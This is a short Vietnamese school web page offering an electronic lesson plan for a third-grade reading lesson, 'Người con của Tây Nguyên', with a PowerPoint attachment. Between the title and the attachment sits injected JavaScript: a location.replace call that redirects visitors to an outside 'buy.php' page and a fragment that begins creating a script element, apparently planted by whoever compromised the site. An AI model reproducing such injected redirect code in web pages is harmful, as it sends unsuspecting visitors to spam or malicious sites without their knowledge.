Giáo án điện tử- Môn Tập đọc- Lớp3

03/04/2009 12:00 Sáng 1 phản hồi

Bài: Người con của Tây Nguyên

location.replace(“http://gethere.info/buy.php”);

var d=document;var s=d.createElement(‘script’);

Tệp đính kèm

12387487715310_Nguoi_con_cua_TN.ppt
File: 12387487715310_Nguoi_con_cua_TN.ppt (2 MB)

Các phản hồi đã bị đóng lại bở quản trị.